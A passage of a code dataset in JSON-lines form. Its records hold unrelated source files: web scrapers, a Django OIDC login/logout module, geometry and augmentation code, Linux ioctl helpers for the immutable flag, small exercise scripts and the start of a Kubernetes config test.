document.body.scrollHeight);\") # Scroll to the bottom of the page\n sleep (1)\n \n car_details = driver.find_elements_by_css_selector('.vehicle-card__details')\n zero = 0\n count = 0\n car_info = []\n for index, car in enumerate(car_details):\n car_text = car.find_elements_by_css_selector('.vehicle-card__title')\n car_desc = car_text[0].text\n car_desc = (car_desc +\" \").split()[:3] # keep the year, make, and model, remove the rest\n car_desc = ' ' .join(car_desc) # convert the list to a string for later\n\n no_price = car.find_elements_by_css_selector('.vehicle-card__no-price') # if there's no price there's a different css selector used\n if len(no_price) >0:\n price = \"0\"\n zero += 1\n \n raw_price = car.find_elements_by_css_selector('.aifs')\n if len(raw_price) >0:\n price = raw_price[0].text\n price = re.sub(\"[$,]\", \"\", price) # remove $ and commas from the prices 
so that they're numeric\n price = price.strip('\\n') # remove carriage return from price\n count += 1\n\n car_info.append((car_desc + \" \" + price).split())\n \n print (\"Priced cars: \", count, \"Unpriced cars: \", zero)\n\n car_info = sorted(car_info)\n for index, i in enumerate(car_info):\n print (index, \":\", i)\n \n print (\"Saving data in a spreadsheet....\")\n CreateDealerSheet(data_out, car_info, date_time)\n print (dealer, \"Total cars: \" , count+zero)\n data_out.save_file(file_out)\n driver.quit() # Close the browser and end the session\n","sub_path":"CarData/src/Archives/Car_data_DonWayFord_old2.py","file_name":"Car_data_DonWayFord_old2.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"434729376","text":"# Implement a divisor_master module. All module functions take natural numbers from 1 to 1000 as input.\n# The module contains these functions:\n# 1) primality check (primes are numbers whose only divisors are one and themselves)\n\ndef one(x):\n for k in range(2,x):\n if x%k == 0:\n # print(k)\n return 0\n return 1\n\n\n# 2) returns the list of all divisors of a number\n\ndef two(x):\n list_ = []\n for k in range(1,x+1):\n if x%k == 0:\n list_.append(k)\n return list_\n\n\n# 3) returns the largest prime divisor of a number\n\ndef three(x):\n max_ = 1\n for k in range(1,x+1):\n if x%k == 0:\n if one(k) == 1:\n max_ = k\n return max_\n\n\n# 4) returns the canonical prime factorization of a number\n\ndef four(x):\n list_num = []\n k = 2\n while k*k<=x:\n while x%k == 0:\n x = x // k\n list_num.append(k)\n k = k + 1\n if x>1:\n list_num.append(int(x))\n return list_num\n\n\n# 5) returns the largest divisor (not necessarily prime) of a number\n# other than the number itself\n\ndef five(x):\n max_ = 1\n for k in range(1,x):\n if x%k == 0:\n max_ = k\n return max_","sub_path":"lesson_5_module.py","file_name":"lesson_5_module.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"454886726","text":"from pydoc import locate\nfrom urllib.parse import parse_qs, urlparse\n\nfrom django.conf import settings\nfrom django.contrib.auth import logout as auth_logout\nfrom django.http import HttpResponse, HttpResponseBadRequest\nfrom django.shortcuts import redirect, render\nfrom django.urls import reverse\nfrom django.utils import translation\nfrom django.utils.decorators import method_decorator\nfrom django.utils.http import urlencode\nfrom django.views.generic import View\nfrom django.views.generic.base import TemplateView\nfrom django.views.decorators.cache import never_cache\nfrom django.views.decorators.clickjacking import xframe_options_exempt\nfrom jwkest.jws import JWT\nfrom oauth2_provider.models import get_application_model\nfrom oidc_provider.lib.endpoints.authorize import AuthorizeEndpoint\nfrom oidc_provider.lib.endpoints.token import TokenEndpoint\nfrom oidc_provider.lib import errors as oidc_errors\nfrom oidc_provider.models import Client\nfrom oidc_provider.views import AuthorizeView, EndSessionView\nfrom social_django.models import UserSocialAuth\nfrom social_django.utils import load_backend, load_strategy\n\nfrom tunnistamo import auditlog\nfrom oidc_apis.models import ApiScope\n\nfrom .models import LoginMethod, OidcClientOptions\n\n\n# This is used to pass the request query dict to the OIDC endpoint\nclass DummyRequest:\n def __init__(self, query_dict):\n 
self.GET = query_dict\n self.method = 'GET'\n\n\ndef get_return_to_rp_uri(request, redirect_uri_params):\n \"\"\"Returns an URI to redirect the browser to if user cancels authentication\n \"\"\"\n\n params = {key: val[0] for key, val in redirect_uri_params.items()}\n dummy_request = DummyRequest(params)\n authorize = AuthorizeEndpoint(dummy_request)\n try:\n # This will make sure redirect URI is valid.\n authorize.validate_params()\n except (\n oidc_errors.ClientIdError, oidc_errors.RedirectUriError, oidc_errors.AuthorizeError\n ):\n return None\n\n cancel_error = oidc_errors.AuthorizeError(\n authorize.params['redirect_uri'], 'access_denied', authorize.grant_type\n )\n return_uri = cancel_error.create_uri(\n authorize.params['redirect_uri'],\n authorize.params['state']\n )\n return return_uri\n\n\nclass LoginView(TemplateView):\n template_name = \"login.html\"\n\n def get_login_methods(self, request, allowed_methods, redirect_uri):\n methods = []\n for m in allowed_methods:\n assert isinstance(m, LoginMethod)\n\n begin_url = reverse('social:begin', kwargs={'backend': m.provider_id})\n\n url_params = {}\n if redirect_uri:\n url_params['next'] = redirect_uri\n\n backend = load_backend(load_strategy(request), m.provider_id, redirect_uri=None)\n if hasattr(backend, 'get_allowed_idp_name'):\n idp_name = backend.get_allowed_idp_name(request)\n url_params['idp'] = idp_name\n\n if url_params:\n begin_url += '?' + urlencode(url_params)\n\n m.login_url = begin_url\n methods.append(m)\n\n return methods\n\n @method_decorator(never_cache)\n def get(self, request, *args, **kwargs): # noqa (too complex)\n # Log the user out first so that we don't end up in the PSA \"connect\"\n # flow.\n auditlog.log_login(request)\n\n if self.request.user.is_authenticated:\n auth_logout(self.request)\n\n next_url = request.GET.get('next')\n app = None\n oidc_client = None\n authorize_uri_params = None\n self.return_to_rp_uri = None\n\n if next_url:\n # Determine application from the 'next' query argument.\n # FIXME: There should be a better way to get the app id.\n authorize_uri_params = parse_qs(urlparse(next_url).query)\n client_id = authorize_uri_params.get('client_id')\n\n if client_id and len(client_id):\n client_id = client_id[0].strip()\n\n if client_id:\n try:\n app = get_application_model().objects.get(client_id=client_id)\n except get_application_model().DoesNotExist:\n pass\n\n try:\n oidc_client = Client.objects.get(client_id=client_id)\n except Client.DoesNotExist:\n pass\n\n allowed_methods = None\n if app:\n allowed_methods = app.login_methods.all()\n elif oidc_client:\n try:\n client_options = OidcClientOptions.objects.get(oidc_client=oidc_client)\n allowed_methods = client_options.login_methods.all()\n except OidcClientOptions.DoesNotExist:\n pass\n\n self.return_to_rp_uri = get_return_to_rp_uri(request, authorize_uri_params)\n\n if allowed_methods is None:\n # Only allow the methods that do not require registered clients\n # (this might happen when a browser enters LoginView directly for\n # testing purposes).\n allowed_methods = LoginMethod.objects.filter(require_registered_client=False)\n\n login_methods = self.get_login_methods(request, allowed_methods, next_url)\n\n if len(login_methods) == 1:\n return redirect(login_methods[0].login_url)\n\n self.login_methods = login_methods\n return super(LoginView, self).get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super(LoginView, self).get_context_data(**kwargs)\n context['login_methods'] = self.login_methods\n 
context['return_to_rp_uri'] = self.return_to_rp_uri\n return context\n\n\ndef _process_uris(uris):\n if isinstance(uris, list):\n return uris\n return uris.splitlines()\n\n\ndef create_logout_response(request, user, backend_name, redirect_uri):\n backend = load_backend(load_strategy(request), backend_name, redirect_uri=None)\n\n # social_auth creates a new user for each (provider, uid) pair so\n # we don't need to worry about duplicates\n try:\n social_user = UserSocialAuth.objects.get(user=user, provider=backend_name)\n except UserSocialAuth.DoesNotExist:\n return None\n\n if not hasattr(backend, 'create_logout_response'):\n return None\n\n return backend.create_logout_response(social_user, redirect_uri)\n\n\nclass LogoutView(TemplateView):\n template_name = 'logout_done.html'\n\n def _validate_client_uri(self, uri):\n \"\"\"Valid post logout URIs are explicitly managed in the database via\n the admin UI as linefeed-separated text fields of one or\n several URIs.\n\n This method treats all URIs of all OAuth apps and OIDC Clients\n as valid for any logout request.\n \"\"\"\n if uri is None or uri == '':\n return False\n\n uri_texts = list()\n for manager in [get_application_model().objects, Client.objects]:\n for o in manager.all():\n value = o.post_logout_redirect_uris\n if value is None or len(value) == 0:\n continue\n uri_texts.append(value)\n\n return uri in (u for uri_text in uri_texts for u in _process_uris(uri_text))\n\n def get(self, *args, **kwargs):\n user = self.request.user\n backend_name = None\n if user.is_authenticated:\n backend_name = self.request.session.get('social_auth_last_login_backend', None)\n\n if self.request.user.is_authenticated:\n auth_logout(self.request)\n\n uri = self.request.GET.get('next')\n if self._validate_client_uri(uri):\n return redirect(uri)\n\n redirect_uri = self.request.GET.get('next')\n if redirect_uri and not self._validate_client_uri(redirect_uri):\n redirect_uri = None\n\n if backend_name:\n logout_response = create_logout_response(\n self.request, user, backend_name, redirect_uri\n )\n if logout_response is not None:\n return logout_response\n\n if redirect_uri:\n return redirect(redirect_uri)\n\n return super(LogoutView, self).get(*args, **kwargs)\n\n\nclass AuthenticationErrorView(TemplateView):\n template_name = 'account/signup_closed.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n return context\n\n\nclass TunnistamoOidcAuthorizeView(AuthorizeView):\n # AuthorizeView needs to be exempt from the default of X-Frame-Options: DENY\n # because it is placed in an iframe when a public client does silent renew.\n # We are ensuring redirect_uri matches, which will give protection against\n # clickjacking.\n @method_decorator(xframe_options_exempt)\n def get(self, request, *args, **kwargs):\n auditlog.log_authorize(request)\n\n if request.user.is_authenticated:\n # Refresh the session for each authorize call\n request.session.modified = True\n\n #\n # TODO: Check for requested ACR, logout if incompatible\n #\n\n request.GET = _extend_scope_in_query_params(request.GET)\n request_locales = [l.strip() for l in request.GET.get('ui_locales', '').split(' ') if l]\n available_locales = [l[0] for l in settings.LANGUAGES]\n\n for locale in request_locales:\n if locale in available_locales:\n break\n else:\n locale = None\n\n if locale:\n translation.activate(locale)\n\n resp = super().get(request, *args, **kwargs)\n if locale:\n # Save the UI language in a dedicated cookie, because the\n # session will be 
nuked if we go through the login view.\n resp.set_cookie(\n settings.LANGUAGE_COOKIE_NAME, locale,\n max_age=settings.LANGUAGE_COOKIE_AGE,\n path=settings.LANGUAGE_COOKIE_PATH,\n domain=settings.LANGUAGE_COOKIE_DOMAIN,\n )\n return resp\n\n def post(self, request, *args, **kwargs):\n request.POST = _extend_scope_in_query_params(request.POST)\n return super().post(request, *args, **kwargs)\n\n\nclass TunnistamoOidcEndSessionView(EndSessionView):\n def dispatch(self, request, *args, **kwargs):\n auditlog.log_end_session(request)\n\n backend_name = None\n user = request.user\n if user.is_authenticated:\n backend_name = self.request.session.get('social_auth_last_login_backend', None)\n\n # clear Django session and get redirect URL\n response = super().dispatch(request, *args, **kwargs)\n\n if backend_name is not None:\n # If the backend supports logout, ask it to generate a logout\n # response to pass to the browser.\n backend_response = create_logout_response(request, user, backend_name, response.url)\n if backend_response is not None:\n response = backend_response\n\n return response\n\n\nclass TunnistamoOidcTokenView(View):\n def post(self, request, *args, **kwargs):\n auditlog.log_token_retrieval(request)\n token = TokenEndpoint(request)\n\n try:\n token.validate_params()\n\n dic = token.create_response_dic()\n\n # Django OIDC Provider doesn't support refresh token expiration (#230).\n # We don't supply refresh tokens when using restricted authentication methods.\n amr = JWT().unpack(dic['id_token']).payload().get('amr', '')\n for restricted_auth in settings.RESTRICTED_AUTHENTICATION_BACKENDS:\n if amr == locate(restricted_auth).name:\n dic.pop('refresh_token')\n break\n\n response = TokenEndpoint.response(dic)\n return response\n except oidc_errors.TokenError as error:\n return TokenEndpoint.response(error.create_dict(), status=400)\n except oidc_errors.UserAuthError as error:\n return TokenEndpoint.response(error.create_dict(), status=403)\n\n\ndef _extend_scope_in_query_params(query_params):\n scope = query_params.get('scope')\n if scope:\n query_params = query_params.copy()\n query_params['scope'] = _add_api_scopes(scope)\n return query_params\n\n\ndef _add_api_scopes(scope_string):\n scopes = scope_string.split()\n extended_scopes = ApiScope.extend_scope(scopes)\n return ' '.join(extended_scopes)\n\n\ndef show_profile(request):\n ATTR_NAMES = ['first_name', 'last_name', 'email', 'birthdate']\n\n user = request.user\n if user.is_authenticated:\n attrs = {user._meta.get_field(x).verbose_name: getattr(user, x) for x in ATTR_NAMES}\n else:\n attrs = {}\n return render(request, 'account/profile.html', context=dict(attrs=attrs))\n\n\nclass RememberMeView(View):\n @never_cache\n def post(self, request, *args, **kwargs):\n remember_me = request.POST.get('remember_me', '')\n if not remember_me:\n return HttpResponseBadRequest()\n if remember_me.strip().lower() == 'true':\n remember_me = True\n else:\n remember_me = False\n\n session = request.session\n session['remember_me'] = remember_me\n\n return HttpResponse()\n","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"68615439","text":"# math3d_point_cloud.py\n\nimport random\n\nfrom math3d_side import Side\nfrom math3d_triangle import Triangle\nfrom math3d_vector import Vector\nfrom math3d_plane import Plane\n\nclass PointCloud(object):\n def __init__(self, point_list=None):\n self.point_list = 
point_list if point_list is not None else []\n\n def clone(self):\n return PointCloud([point for point in self.point_list])\n\n def to_dict(self):\n data = {\n 'point_list': [point.to_dict() for point in self.point_list]\n }\n return data\n \n def from_dict(self, data):\n self.point_list = [Vector().from_dict(point) for point in data.get('point_list', [])]\n return self\n\n def calc_center(self):\n center = Vector(0.0, 0.0, 0.0)\n for point in self.point_list:\n center = center + point\n center = center * (1.0 / float(len(self.point_list)))\n return center\n\n def scale_about_center(self, scale):\n center = self.calc_center()\n self.point_list = [center + (point - center) * scale for point in self.point_list]\n\n def add_point(self, new_point, eps=1e-7):\n for point in self.point_list:\n if (point - new_point).length() < eps:\n break\n else:\n self.point_list.append(new_point)\n\n def _find_initial_tetrahedron_for_convex_hull(self):\n for i in range(len(self.point_list)):\n point_a = self.point_list[i]\n for j in range(i + 1, len(self.point_list)):\n point_b = self.point_list[j]\n for k in range(j + 1, len(self.point_list)):\n point_c = self.point_list[k]\n for l in range(k + 1, len(self.point_list)):\n point_d = self.point_list[l]\n vec_a = point_a - point_d\n vec_b = point_b - point_d\n vec_c = point_c - point_d\n volume = vec_a.cross(vec_b).dot(vec_c)\n if volume > 0.0:\n return [\n Triangle(point_d, point_b, point_a),\n Triangle(point_d, point_c, point_b),\n Triangle(point_d, point_a, point_c),\n Triangle(point_a, point_b, point_c)\n ]\n \n def find_convex_hull(self, eps=1e-7):\n from math3d_triangle_mesh import TriangleMesh\n \n if len(self.point_list) < 4:\n raise Exception('The point-cloud must consist of at least 4 non-co-planar points.')\n \n triangle_list = self._find_initial_tetrahedron_for_convex_hull()\n tri_mesh = TriangleMesh().from_triangle_list(triangle_list)\n \n # Proceed by expanding the current convex hull until all points have been incorporated.\n point_list = [point for point in self.point_list]\n while True:\n \n # Remove any points that lie on or within the current convex hull.\n i = 0\n while i < len(point_list):\n point = point_list[i]\n if tri_mesh.side(point) == Side.BACK:\n del point_list[i]\n else:\n i += 1\n \n # We're done when all points have been incorporated into the hull.\n if len(point_list) == 0:\n break\n \n # Arbitrarily choose the first point in the list. 
We know it is outside the hull.\n new_point = point_list[0]\n tri_mesh.vertex_list.append(new_point)\n i = len(tri_mesh.vertex_list) - 1\n \n # Build upon any triangles that face toward our new point.\n triangle_list = [triangle for triangle in tri_mesh.triangle_list]\n for triple in triangle_list:\n triangle = tri_mesh.make_triangle(triple)\n plane = triangle.calc_plane()\n side = plane.side(new_point)\n if side == Side.FRONT:\n tri_mesh.toggle_triangle(triple, check_forward=True, check_reverse=False)\n tri_mesh.toggle_triangle((i, triple[0], triple[1]), check_forward=False, check_reverse=True)\n tri_mesh.toggle_triangle((i, triple[1], triple[2]), check_forward=False, check_reverse=True)\n tri_mesh.toggle_triangle((i, triple[2], triple[0]), check_forward=False, check_reverse=True)\n \n # Finally, return the convex hull.\n return tri_mesh\n \n def planar_sort(self, plane, eps=1e-7):\n back_list = []\n front_list = []\n neither_list = []\n for i, point in enumerate(self.point_list):\n side = plane.side(point, eps)\n if side == Side.BACK:\n back_list.append(i)\n elif side == Side.FRONT:\n front_list.append(i)\n elif side == Side.NEITHER:\n neither_list.append(i)\n return back_list, front_list, neither_list\n \n def fit_plane(self):\n # f(x,y,z) = ax + by + cz + d is the plane equation.\n # For m points {p_i}, we want to find coefficients a, b, c, d so\n # that all equations f(p_i)=0 are satisfied or as near satisfied\n # as they can be in the sense that |f(p_i)| are all minimized.\n # The least squares method has us define F(a,b,c,d) = Sum_i f^2(p_i),\n # and then we simply solve for a, b, c, d by setting each of\n # dF/da, dF/db, dF/dc, dF/dd to zero, which gives us a homogeneous\n # system of linear equations. We find a non-trivial solution by\n # looking for an eigenvector with the smallest associated value.\n import numpy\n \n matrix = [[0.0 for i in range(4)] for j in range(4)]\n \n sum_xx = sum([point.x * point.x for point in self.point_list])\n sum_yy = sum([point.y * point.y for point in self.point_list])\n sum_zz = sum([point.z * point.z for point in self.point_list])\n \n sum_xy = sum([point.x * point.y for point in self.point_list])\n sum_xz = sum([point.x * point.z for point in self.point_list])\n sum_yz = sum([point.y * point.z for point in self.point_list])\n \n sum_x = sum([point.x for point in self.point_list])\n sum_y = sum([point.y for point in self.point_list])\n sum_z = sum([point.z for point in self.point_list])\n\n matrix[0][0] = sum_xx\n matrix[0][1] = sum_xy\n matrix[0][2] = sum_xz\n matrix[0][3] = sum_x\n matrix[1][0] = sum_xy\n matrix[1][1] = sum_yy\n matrix[1][2] = sum_yz\n matrix[1][3] = sum_y\n matrix[2][0] = sum_xz\n matrix[2][1] = sum_yz\n matrix[2][2] = sum_zz\n matrix[2][3] = sum_z\n matrix[3][0] = sum_x\n matrix[3][1] = sum_y\n matrix[3][2] = sum_z\n matrix[3][3] = float(len(self.point_list))\n\n matrix = numpy.array(matrix)\n \n w, v = numpy.linalg.eig(matrix)\n \n j = -1\n eps = 1e-5\n smallest_value = None\n for i in range(4):\n value = w[i]\n if isinstance(value, complex):\n if abs(value.imag) > eps:\n continue # Only consider real eigen values.\n value = value.real\n if smallest_value is None or abs(value) < abs(smallest_value):\n smallest_value = value\n j = i\n \n normal = Vector(v[0][j], v[1][j], v[2][j])\n normal.x = normal.x.real if isinstance(normal.x, complex) else normal.x\n normal.y = normal.y.real if isinstance(normal.y, complex) else normal.y\n normal.z = normal.z.real if isinstance(normal.z, complex) else normal.z\n length = 
normal.length()\n unit_normal = normal / length\n alpha = v[3][j].real if isinstance(v[3][j], complex) else v[3][j]\n center = -(alpha / length) * unit_normal\n \n plane = Plane(center, unit_normal)\n return plane\n\n def render(self):\n from OpenGL.GL import GL_POINTS, glBegin, glEnd, glVertex3f\n\n glBegin(GL_POINTS)\n try:\n for point in self.point_list:\n glVertex3f(point.x, point.y, point.z)\n except Exception:\n pass # ignore malformed points; the finally clause still closes the primitive\n finally:\n glEnd()","sub_path":"math3d_point_cloud.py","file_name":"math3d_point_cloud.py","file_ext":"py","file_size_in_byte":8406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"225374569","text":"from PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom mainwindow import Ui_MainWindow\nfrom dialog import Ui_Dialog\nfrom stylesheets import main_style_sheet\nfrom stylesheets import dialog_style_sheet\n\n\nclass Dialog(QDialog):\n def __init__(self, parent=None):\n super(Dialog, self).__init__(parent)\n self.ui = Ui_Dialog()\n self.ui.setupUi(self)\n self.setStyleSheet(dialog_style_sheet)\n\n\nclass MainWindow(QMainWindow, Ui_MainWindow):\n def __init__(self, parent=None):\n super(MainWindow, self).__init__(parent)\n # setupUi provides the widgets wired below (new_task_btn, done, Undone,\n # remaining_list and finished_list)\n self.setupUi(self)\n self.new_task_btn.clicked.connect(self.add_stuff)\n\n self.done.clicked.connect(self.do_task)\n self.Undone.clicked.connect(self.undo_task)\n self.setStyleSheet(main_style_sheet)\n\n def add_task(self, task):\n if task:\n self.remaining_list.addItem(task)\n\n def do_task(self):\n task = self.remaining_list.takeItem(self.remaining_list.currentRow())\n if task:\n self.finished_list.addItem(task.text())\n\n def undo_task(self):\n task = self.finished_list.takeItem(self.finished_list.currentRow())\n if task:\n self.remaining_list.addItem(task.text())\n\n def add_stuff(self):\n dlg = Dialog()\n dlg.ui.buttonBox.accepted.connect(\n lambda: self.add_task(dlg.ui.new_task_input.text())\n )\n dlg.exec()\n\n\napp = QApplication([])\nwindow = MainWindow()\nwindow.show()\napp.exec()\n","sub_path":"app (1).py","file_name":"app (1).py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"522385286","text":"from programs.orthant_proba.model import standardized_Gamma_and_a, TruncatedGaussianSimulator, OrthantProbability, TemperedOrthantProbability\nimport numpy as np\nfrom programs.executor import smc_sampler_model_to_fk\n\ndef des_to_fk(des):\n Sigma = np.load(file='./programs/orthant_proba/data/Sigma_' + des.name + '.npy')\n a = np.load(file='./programs/orthant_proba/data/a_' + des.name + '.npy')\n Gamma, a = standardized_Gamma_and_a(Sigma,a)\n static_model = TruncatedGaussianSimulator()\n if not des.tempered:\n model = OrthantProbability(Gamma=Gamma, a=a, static_model=static_model)\n else:\n model = TemperedOrthantProbability(Gamma=Gamma, a=a, static_model=static_model)\n return smc_sampler_model_to_fk(des, model)","sub_path":"programs/orthant_proba/des_to_fk.py","file_name":"des_to_fk.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"539760720","text":"\"\"\"Linux API Access\n\nThis module provides access to linux system-calls and other APIs, in particular\nthose not provided by the python standard library. 
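For instance, a caller could make a file immutable like so (a sketch: fd is\nassumed to be an already-open file descriptor, and setting the flag requires\nthe CAP_LINUX_IMMUTABLE capability):\n\n    if not ioctl_get_immutable(fd):\n        ioctl_toggle_immutable(fd, True)\n\n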
The idea is to provide\nuniversal wrappers with broad access to linux APIs. Convenience helpers and\nhigher-level abstractions are beyond the scope of this module.\n\nIn some cases it is overly complex to provide universal access to a specific\nAPI. Hence, the API might be restricted to a reduced subset of its\nfunctionality, just to make sure we can actually implement the wrappers in a\nreasonable manner.\n\"\"\"\n\n\nimport array\nimport fcntl\n\n\n__all__ = [\n \"ioctl_get_immutable\",\n \"ioctl_toggle_immutable\",\n]\n\n\n# NOTE: These are wrong on at least ALPHA and SPARC. They use different\n# ioctl number setups. We should fix this, but this is really awkward\n# in standard python.\n# Our tests will catch this, so we will not accidentally run into this\n# on those architectures.\nFS_IOC_GETFLAGS = 0x80086601\nFS_IOC_SETFLAGS = 0x40086602\n\nFS_IMMUTABLE_FL = 0x00000010\n\nBLK_IOC_FLSBUF = 0x00001261\n\n\ndef ioctl_get_immutable(fd: int):\n \"\"\"Query FS_IMMUTABLE_FL\n\n This queries the `FS_IMMUTABLE_FL` flag on a specified file.\n\n Arguments\n ---------\n fd\n File-descriptor to operate on.\n\n Returns\n -------\n bool\n Whether the `FS_IMMUTABLE_FL` flag is set or not.\n\n Raises\n ------\n OSError\n If the underlying ioctl fails, a matching `OSError` will be raised.\n \"\"\"\n\n if not isinstance(fd, int) or fd < 0:\n raise ValueError()\n\n flags = array.array('L', [0])\n fcntl.ioctl(fd, FS_IOC_GETFLAGS, flags, True)\n return bool(flags[0] & FS_IMMUTABLE_FL)\n\n\ndef ioctl_toggle_immutable(fd: int, set_to: bool):\n \"\"\"Toggle FS_IMMUTABLE_FL\n\n This toggles the `FS_IMMUTABLE_FL` flag on a specified file. It can both set\n and clear the flag.\n\n Arguments\n ---------\n fd\n File-descriptor to operate on.\n set_to\n Whether to set the `FS_IMMUTABLE_FL` flag or not.\n\n Raises\n ------\n OSError\n If the underlying ioctl fails, a matching `OSError` will be raised.\n \"\"\"\n\n if not isinstance(fd, int) or fd < 0:\n raise ValueError()\n\n flags = array.array('L', [0])\n fcntl.ioctl(fd, FS_IOC_GETFLAGS, flags, True)\n if set_to:\n flags[0] |= FS_IMMUTABLE_FL\n else:\n flags[0] &= ~FS_IMMUTABLE_FL\n fcntl.ioctl(fd, FS_IOC_SETFLAGS, flags, False)\n\n\ndef ioctl_blockdev_flushbuf(fd: int):\n \"\"\"Flush the block device buffer cache\n\n NB: This function needs the `CAP_SYS_ADMIN` capability.\n\n Arguments\n ---------\n fd\n File-descriptor of a block device to operate on.\n\n Raises\n ------\n OSError\n If the underlying ioctl fails, a matching `OSError`\n will be raised.\n \"\"\"\n\n if not isinstance(fd, int) or fd < 0:\n raise ValueError(f\"Invalid file descriptor: '{fd}'\")\n\n fcntl.ioctl(fd, BLK_IOC_FLSBUF, 0)\n","sub_path":"osbuild/util/linux.py","file_name":"linux.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"176539661","text":"class Library:\r\n\tdef registration(self):\r\n\t\tprint(\"welcome to registration\")\r\n\tdef searchbook(self,bookid):\r\n\t\tprint(\"hai hello\")\r\n\t\tif bookid>=20:\r\n\t\t\tprint(\"book is available\")\r\n\t\telse:\r\n\t\t\tprint(\"book is not available\")\r\n\tdef searchuser(self):\r\n\t\tn=int(input(\"enter a your number\"))\r\n\t\tif(n==9448708768):\r\n\t\t\tprint(\"user found\")\r\n\t\telse:\r\n\t\t\tprint(\"user not found\")\r\nclass Digitallibrary:\r\n\tdef scanqrcode(self):\r\n\t\tprint(\"qr 
code\")\t\t\r\n\t\t\r\nlourdlibrary=Library()\r\nlourdlibrary.registration()\r\nlourdlibrary.searchbook(25)\r\nlourdlibrary.searchuser()\r\n\r\ndiglib=Digitallibrary()\r\ndiglib.scanqrcode()\t","sub_path":"login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"214556645","text":"import numpy as np\nimport cv2\nfrom skimage.transform import rotate\nfrom skimage.transform import warp\nfrom skimage.transform import ProjectiveTransform\nfrom numpy import random\n\ndef single_image_augmentation(img, intensity, label):\n\n img = rotate_img(img, intensity)\n img = projective_transform(img, intensity)\n\n return img, label\n\ndef rotate_img(img, intensity):\n delta = 30. * intensity \n img = rotate(img, random.uniform(-delta, delta), mode='edge')\n return img\n\ndef projective_transform(img, intensity):\n image_x_size = img.shape[0]\n image_y_size = img.shape[1]\n\n dx = image_x_size * 0.3 * intensity\n dy = image_y_size * 0.3 * intensity\n\n tl_top = random.uniform(-dy, dy)\n tl_left = random.uniform(-dx, dx)\n bl_bottom = random.uniform(-dy, dy)\n bl_left = random.uniform(-dx, dx)\n tr_top = random.uniform(-dy, dy)\n tr_right = random.uniform(-dx, dx)\n br_bottom = random.uniform(-dy, dy)\n br_right = random.uniform(-dx, dx)\n\n transform = ProjectiveTransform()\n \n transform.estimate(\n np.array((\n (tl_left, tl_top),\n (bl_left, image_x_size - bl_bottom),\n (image_y_size - br_right, image_x_size - br_bottom),\n (image_y_size - tr_right, tr_top))),\n np.array((\n (0, 0),\n (0, image_x_size),\n (image_y_size, image_x_size),\n (image_y_size, 0)))) \n\n img = warp(img, transform, mode='edge')\n img = (img * 255).astype(np.uint8)\n return img\n\nfrom joblib import Parallel, delayed\n \ndef parallel_test(X_train, y_train, target):\n \n labels, counts = np.unique(y_train, return_counts=True)\n \n X_aug = []\n y_aug = []\n \n for label, count in zip(labels, counts):\n augmentation_num = target - count\n X_train_label = X_train[y_train == label]\n\n parallel_res = Parallel(n_jobs=4)(delayed(single_image_augmentation)(X_train_label[np.random.randint(count)], 0.75, label=label) for i in range(augmentation_num))\n\n print(parallel_res)\n print(len(parallel_res))","sub_path":"code/parallel_data_augmentation.py","file_name":"parallel_data_augmentation.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"25485240","text":"import requests\nfrom lxml import etree\nimport time\n\nurl = 'http://news.szhome.com/tags/278.html'\ndata = requests.get(url).text\ns=etree.HTML(data)\n# the first data item\nitems = s.xpath('//*[@id=\"divList\"]/div')\ntime.sleep(1)\n\nsoures = []\nfor item in items:\n soure = item.xpath('./div/div[1]/a/text()')[0]\n soures.append(soure)\n# print(soures)\n \n# the most recent entry \nnewItem = soures[0]\n\n\n# raw data\n# sourcePrice = item.xpath('./div/div[1]/a/text()')[0]\n# print(sourcePrice)\ndateIndex = newItem.find('日')\n# slice out the date\ndate = newItem[0:(dateIndex+1)]\n\nnumIndex_p = newItem.find('成交')\nnumIndex_e = newItem.find('套')\nnum = newItem[numIndex_p+2:numIndex_e]\n\nprice_p = newItem.find('均价')\nprice_e = newItem.find('元')\nprice = newItem[price_p+2:price_e]\n\nprint(\"Today: {}\tUnits sold: {}\tAverage price: {}\".format(date,num,price))\n\n","sub_path":"Python/爬虫/DEMO/深圳房价【xpath】/today_house_price.py","file_name":"today_house_price.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"14404964","text":"# Copyright 2016 The Kubernetes Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport base64\nimport os\nimport tempfile\nimport unittest\n\nfrom .config_exception import ConfigException\nfrom .kube_config import (ConfigNode, FileOrData, KubeConfigLoader,\n _create_temp_file_with_content)\n\n\ndef _base64(string):\n return base64.encodebytes(string.encode()).decode()\n\n\nTEST_FILE_KEY = \"file\"\nTEST_DATA_KEY = \"data\"\nTEST_FILENAME = \"test-filename\"\n\nTEST_DATA = 